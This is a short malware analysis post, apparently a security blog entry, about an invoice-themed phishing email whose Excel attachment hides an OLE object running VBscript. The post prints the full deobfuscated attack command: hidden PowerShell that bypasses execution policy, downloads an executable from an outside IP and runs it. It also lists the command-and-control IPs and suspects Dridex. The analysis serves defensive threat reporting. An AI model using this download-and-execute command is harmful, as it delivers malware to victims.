From: Gerry CarpenterThere is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.
Date: 25 March 2015 at 12:58
Subject: Invoice ID:34bf33
Automated analysis doesn't show very much, but it does show the screenshots  . I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://220.127.116.11/zxr/ssidin.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs:
18.104.22.168 (MWTV, Latvia)
22.214.171.124 (DorukNet, Turkey)
126.96.36.199 (Tsukaeru.net, Japan)
The payload is most likely Dridex.